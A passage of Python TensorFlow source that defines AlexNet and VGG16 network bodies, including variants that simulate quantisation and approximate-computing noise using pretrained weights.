convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4b', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(net.output, [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=4096, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
layers.append(net)
net = Layer.FullyConnected(net.output, outputSize=4096, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC2', dtype=tf.float32)
layers.append(net)
return net.output, layers
def AlexNetBNBody(network, images):
layers = []
standardized = tf.identity(images / 255.0, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4b', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(net.output, [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=4096, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
layers.append(net)
net = Layer.FullyConnected(net.output, outputSize=4096, weightInit=Layer.XavierInit, wd=network._HParam['WeightDecay'], \
bias=True, biasInit=Layer.ConstInit(0.0), \
bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC2', dtype=tf.float32)
layers.append(net)
return net.output, layers
def AlexNetBody_Quant(network, images, preWeights, preBias):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv4a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv4b', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=4096, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC1', dtype=tf.float32)
layers.append(net)
net = Layer.FullyConnected(_outWrapper(net), outputSize=4096, weightInit=Layer.ConstInit(preWeights['FC2']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC2']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC2', dtype=tf.float32)
layers.append(net)
return net, layers
def AlexNetBody_Approx(network, images, preWeights, preBias):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= PORTION * (output - tf.reduce_min(output)) * tf.random_uniform(minval=FROM, maxval=TO, shape=output.shape)
output += PORTION * tf.abs(output) * tf.random_uniform(minval=FROM, maxval=TO, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv1b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv2b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv3b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv4a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
fakeQuant=True, name='Conv4b', dtype=tf.float32)
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=4096, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC1', dtype=tf.float32)
layers.append(net)
net = Layer.FullyConnected(_outWrapper(net), outputSize=4096, weightInit=Layer.ConstInit(preWeights['FC2']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC2']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
fakeQuant=True, name='FC2', dtype=tf.float32)
layers.append(net)
return net, layers
def AlexNetBody_Eval(network, images, preWeights, preBias, preMin, preMax):
def _outWrapper(net):
# Simulate quantization
a = net._outMin
b = net._outMax
s = (b - a) / 255.0
output = net.output
# output = fake_quant_with_min_max_vars(net.output, a, b, num_bits=FAKEBITS, narrow_range=False)
# Simulate value degrade in approximate computing
# output -= 0.2 * (output - tf.reduce_min(output)) * tf.random_uniform(minval=0.0, maxval=1.0, shape=output.shape)
return output
layers = []
standardized = tf.identity(images * (1 / 255.0), name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1a', dtype=tf.float32)
net.setMinMax(preMin['Conv1a'], preMax['Conv1a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=96, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv1b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv1b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1b', dtype=tf.float32)
net.setMinMax(preMin['Conv1b'], preMax['Conv1b'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2a', dtype=tf.float32)
net.setMinMax(preMin['Conv2a'], preMax['Conv2a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv2b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv2b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2b', dtype=tf.float32)
net.setMinMax(preMin['Conv2b'], preMax['Conv2b'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3a', dtype=tf.float32)
net.setMinMax(preMin['Conv3a'], preMax['Conv3a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=384, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv3b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv3b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3b', dtype=tf.float32)
net.setMinMax(preMin['Conv3b'], preMax['Conv3b'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4a']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4a']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4a', dtype=tf.float32)
net.setMinMax(preMin['Conv4a'], preMax['Conv4a'])
layers.append(net)
net = Layer.Conv2D(_outWrapper(net), convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.ConstInit(preWeights['Conv4b']), convPadding='SAME', \
biasInit=Layer.ConstInit(preBias['Conv4b']), \
# bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4b', dtype=tf.float32)
net.setMinMax(preMin['Conv4b'], preMax['Conv4b'])
layers.append(net)
flattened = tf.reshape(_outWrapper(net), [-1, net.output.shape[1]*net.output.shape[2]*net.output.shape[3]])
net = Layer.FullyConnected(flattened, outputSize=4096, weightInit=Layer.ConstInit(preWeights['FC1']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC1']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC1', dtype=tf.float32)
net.setMinMax(preMin['FC1'], preMax['FC1'])
layers.append(net)
net = Layer.FullyConnected(_outWrapper(net), outputSize=4096, weightInit=Layer.ConstInit(preWeights['FC2']), wd=network._HParam['WeightDecay'], \
biasInit=Layer.ConstInit(preBias['FC2']), \
# bn=True, step=network._step, ifTest=network._ifTest, \
activation=Layer.ReLU, \
name='FC2', dtype=tf.float32)
net.setMinMax(preMin['FC2'], preMax['FC2'])
layers.append(net)
return net, layers
def VGG16Body(network, images):
layers = []
standardized = tf.identity(images / 255.0, name='images_standardized')
net = Layer.Conv2D(standardized, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=32, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv1b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=64, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv2b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3a', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3b', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=128, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv3c', dtype=tf.float32)
layers.append(net)
net = Layer.Conv2D(net.output, convChannels=256, \
convKernel=[3, 3], convStride=[1, 1], convWD=network._HParam['WeightDecay'], \
convInit=Layer.XavierInit, convPadding='SAME', \
bias=True, biasInit=Layer.ConstInit(0.0), \
#bn=True, step=network._step, ifTest=network._ifTest, epsilon=1e-8, \
# pool=True, poolSize=[2, 2], poolStride=[2, 2], poolType=Layer.MaxPool, poolPadding='SAME', \
activation=Layer.ReLU, \
name='Conv4a', dtype=tf.float32)
layers.append(net)
